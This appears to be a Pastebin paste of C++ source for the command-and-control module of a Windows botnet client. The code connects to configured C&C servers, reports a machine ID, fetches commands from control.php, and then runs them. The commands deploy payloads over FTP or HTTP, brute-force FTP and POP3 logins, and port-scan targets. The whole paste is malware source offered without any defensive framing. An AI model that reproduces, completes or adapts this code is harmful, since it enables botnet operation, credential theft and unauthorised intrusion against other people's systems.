SHARE
TWEET

Untitled

a guest Jun 8th, 2017 68 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. =========================
  2.  
  3. Control.h
  4.  
  5. =========================
  6.  
  7. #ifndef CONTROL_H
  8. #define CONTROL_H
  9.  
  10. #include "includes.h"
  11.  
  12. class ControlProcClass: public ThreadClass
  13. {
  14.  
  15.     public:
  16.  
  17.         ControlProcClass();
  18.         ~ControlProcClass();
  19.  
  20.         void run();
  21.         int ConnectToServer(string hostname, int port);
  22.         int ConnectToServers();
  23.         int GetCommands();
  24.         int ResolveCommands();
  25.         int ExecuteCommands();
  26.         int returnSock();
  27.         void CommandRoutine();
  28.         void waitKillAllThreads();
  29.  
  30.         string Received;
  31.  
  32.     private:
  33.  
  34.         vector <string> hostnames;
  35.         vector <int> ports;
  36.  
  37.         DebugLog * Log;
  38.  
  39.         ThreadManager * ThreadPool;
  40.  
  41.         string Hostname;
  42.         int port;
  43.        
  44.         SOCKET sock;
  45.  
  46.         vector<string> commands;
  47.  
  48.         int nHostnames;
  49.  
  50. };
  51.  
  52. #endif
  53.  
  54. ==============
  55.  
  56. Control.cpp
  57.  
  58. ==============
  59.  
  60. #include "includes.h"
  61.  
  62.  
  63. ControlProcClass::ControlProcClass() : ThreadClass()
  64. {
  65.     Log = DebugLog::initialize();
  66.     Log->writeLog(400, __LINE__, __FILE__, "Creating CommandProcClass");
  67.     string buffer;
  68.     vector <string> tokens;
  69.     buffer = CNC_SERVER_HOSTNAMES;
  70.     SplitString(buffer, hostnames, ",");
  71.     buffer = CNC_SERVER_PORTS;
  72.     SplitString(buffer, tokens, ",");
  73.     for (int i = 0; i != tokens.size(); i++)
  74.     {
  75.         ports.push_back(atoi(tokens[i].c_str()));
  76.     }
  77.     Log->writeLog(400, __LINE__, __FILE__, "Set Control Variables");
  78.     ThreadPool = ThreadManager::initialize();
  79.  
  80. }
  81.  
  82. ControlProcClass::~ControlProcClass()
  83. {
  84.     Log->writeLog(400, __LINE__, __FILE__, "Destroying ControlClass"); 
  85. }
  86.  
  87. int ControlProcClass::returnSock()
  88. {
  89.     ConnectToServers();
  90.     return sock;
  91. }
  92.  
  93. void ControlProcClass::run()
  94. {
  95.     Log = DebugLog::initialize();
  96.     Log->writeLog(400, __LINE__, __FILE__, "Starting command collection routine");
  97.     Log->writeLog(400, __LINE__, __FILE__, "Connecting to Command Servers");
  98.  
  99.     if ((ConnectToServers()) == 1)
  100.     {
  101.        
  102.     }
  103.  
  104.     GetCommands();
  105.  
  106.     ResolveCommands();
  107.  
  108.     ExecuteCommands();
  109.  
  110.     Log->writeLog(400, __LINE__, __FILE__, "Command collection routing completed");
  111.  
  112.     return;
  113.  
  114. }
  115.  
  116. int ControlProcClass::ConnectToServers()
  117. {
  118.  
  119.     int result = 2;
  120.     for (int i = 0; i != hostnames.size(); i++)
  121.     {
  122.        
  123.         result = ConnectToServer(hostnames[i], ports[i]);
  124.         Hostname = hostnames[i];
  125.         port = ports[i];
  126.         if (result != 2)
  127.         {
  128.             break;
  129.         }
  130.         Log->writeLog(400, __LINE__, __FILE__,"Attempting connection to server - " + Hostname + "on TCP port " + IntToString(port));
  131.     }
  132.     Log->writeLog(400, __LINE__, __FILE__,"Connected to Command Server - " + Hostname + "on TCP port " + IntToString(port));
  133.     return 0;
  134.  
  135. }
  136.  
  137. int ControlProcClass::ConnectToServer(string hostname, int port)
  138. {
  139.    
  140.     int error;
  141.     string buffer;
  142.     struct sockaddr_in sin;
  143.     sock = socket(AF_INET, SOCK_STREAM, 0);
  144.     if (sock == INVALID_SOCKET)
  145.     {
  146.         error = GetLastError();
  147.         buffer = "Socket Function, WSAError: " + IntToString(error);
  148.         Log->writeLog(200, __LINE__, __FILE__, buffer);
  149.         return 2;  
  150.     }  
  151.     memset( &sin, 0, sizeof(sin) );
  152.     sin.sin_addr.s_addr = GetHostname(hostname);
  153.     sin.sin_family = AF_INET;
  154.     sin.sin_port = htons(port);
  155.     if (connect(sock, (sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR)
  156.     {
  157.         error = GetLastError();
  158.         buffer = "Connect Function, WSAError: " + IntToString(error);
  159.         Log->writeLog(200, __LINE__, __FILE__, buffer);
  160.         return 2;  
  161.     }
  162.     if (sock == INVALID_SOCKET)
  163.     {
  164.         error = GetLastError();
  165.         buffer = "INVALID_SOCKET error, WSAError: " + IntToString(error);
  166.         Log->writeLog(200, __LINE__, __FILE__, buffer);
  167.         return 2;  
  168.     }
  169.     /* string Request = "GET /control.php?id=1 HTTP/1.1\r\nHost:"+Hostname+" \r\nUser-Agent:Mozilla/4.0\r\n\r\n";
  170.     send(sock, Request.c_str(), Request.size(), 0);
  171.     char recvbuffer[4024];
  172.     recv(sock, recvbuffer, 4024, 0);
  173.     Received = recvbuffer;
  174.     vector<string> tokens;
  175.     SplitString(Received, tokens, "\n");
  176.     if (tokens[0].find("HTTP/1.1 404 Not Found") != string.npos)
  177.     {
  178.         Log->writeLog(200, __LINE__, __FILE__, "404 Error");
  179.         return 2;
  180.     }*/
  181.     return 0;
  182. }
  183.  
  184. int ControlProcClass::GetCommands()
  185. {
  186.  
  187.     string MachineID = ReturnMachineID();
  188.     string Request = "GET /control.php?id="+MachineID+" HTTP/1.1\r\nHost:"+Hostname+" \r\nUser-Agent:Mozilla/4.0\r\n\r\n";
  189.     send(sock, Request.c_str(), Request.size(), 0);
  190.     char buffer[4024];
  191.     recv(sock, buffer, 4024, 0);
  192.     Received = buffer;
  193.     return 0;
  194.  
  195. }
  196.  
  197. int ControlProcClass::ResolveCommands()
  198. {
  199.  
  200.     Log->writeLog(400, __LINE__, __FILE__, "Splitting command string into an array");
  201.     vector<string> tokens;
  202.     SplitString(Received, tokens, "\n");
  203.     int nCommands = 0;
  204.     int sCommands = 0;
  205.     for (int i = 0; i < tokens.size(); i++)
  206.     {
  207.         if (tokens[i].find("END") != string::npos)
  208.         {
  209.             sCommands = 0;
  210.         }
  211.         else if (sCommands == 1)
  212.         {
  213.             nCommands++;
  214.             commands.push_back(tokens[i]);
  215.             Log->writeLog(400, __LINE__, __FILE__, "Found Command "+tokens[i]);
  216.         }
  217.         else if (tokens[i].find("START") != string::npos)
  218.         {
  219.             sCommands = 1;
  220.         }
  221.     }
  222.     Log->writeLog(400, __LINE__, __FILE__, "Received "+IntToString(nCommands)+" commands from control server");
  223.     return 0;
  224.  
  225. }
  226.  
  227. int ControlProcClass::ExecuteCommands()
  228. {
  229.     Log->writeLog(400, __LINE__, __FILE__, "Executing Commands");
  230.     vector<string> tokens;
  231.     for (int i = 0; i != commands.size(); i++)
  232.     {
  233.         SplitString(commands[i], tokens, ";");
  234.         //
  235.         // "DEPLOY via FTP" command
  236.         //
  237.         Log->writeLog(400, __LINE__, __FILE__, "Tokens: "+tokens[0]);
  238.         if (tokens[0].find("111") != string::npos)
  239.         {
  240.             string hostname = tokens[1];
  241.             string filename = tokens[2];
  242.             string username = tokens[3];
  243.             string password = tokens[4];
  244.             DeployClass DeployFTP;
  245.             DeployFTP.setFTP(hostname, 21, username, password, filename);
  246.             DeployFTP.Start("DEPLOY_FTP");
  247.         }
  248.         //
  249.         // "DEPLOY via HTTP" command
  250.         //
  251.         if (tokens[0].find("112") != string::npos)
  252.         {
  253.             string url = tokens[1];
  254.             DeployClass DeployHTTP;
  255.             DeployHTTP.setHTTP(url);
  256.             DeployHTTP.Start("DEPLOY_HTTP");
  257.         }
  258.         // "BRUTE" command
  259.         if (tokens[0].find("201") != string::npos)
  260.         {
  261.             string hostname = tokens[1];
  262.             string usernames = tokens[2];
  263.             string passwords = tokens[3];
  264.             string protocol = tokens[4];
  265.             BruteClass Brute;
  266.             Brute.setIPAddress(hostname);
  267.             if (protocol.find("21") != string::npos)
  268.             {
  269.                 Brute.setProtocol(21);
  270.             }
  271.             else if (protocol.find("110") != string::npos)
  272.             {
  273.                 Brute.setProtocol(110);
  274.             }
  275.             Brute.setUserPass(atoi(usernames.c_str()), atoi(passwords.c_str()));
  276.             Brute.Start("BRUTE");
  277.         }
  278.         // "SCAN" command
  279.         if (tokens[0].find("202") != string::npos)
  280.         {
  281.             Log->writeLog(400, __LINE__, __FILE__, "Found Scan Command");
  282.             string ipaddress = tokens[1];
  283.             vector <string> tokenss;
  284.             SplitString(ipaddress, tokenss, ";");
  285.             ipaddress = tokenss[0];
  286.             Log->writeLog(400, __LINE__, __FILE__, "Executing Scan Command");
  287.             PortsClass Ports;
  288.             Ports.setIPAddress(ipaddress);
  289.             Log->writeLog(400, __LINE__, __FILE__, "Starting now");
  290.             Ports.Start("SCAN");
  291.         }
  292.        
  293.     }
  294.     waitKillAllThreads();
  295.     return 0;
  296. }
  297.  
  298. void ControlProcClass::waitKillAllThreads()
  299. {
  300.     Log->writeLog(400, __LINE__, __FILE__, "Being waiting section...");
  301.     string buffer;
  302.     int temp = ThreadPool->returnThreadPointer();
  303.     for (int i = 0; i <= temp; i++)
  304.     {
  305.         buffer = ThreadPool->returnThreadName(i);
  306.         Log->writeLog(400, __LINE__, __FILE__, "First thread: "+buffer);
  307.         if (buffer.compare("CNC") != 0 && !buffer.empty())
  308.         {
  309.             Log->writeLog(400, __LINE__, __FILE__, "Found thread, waiting...");
  310.             ThreadPool->waitSingleThread(i);
  311.             Log->writeLog(400, __LINE__, __FILE__, "Thread has now finished");
  312.             ThreadPool->killThread(i);
  313.         }
  314.  
  315.     }
  316.  
  317. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top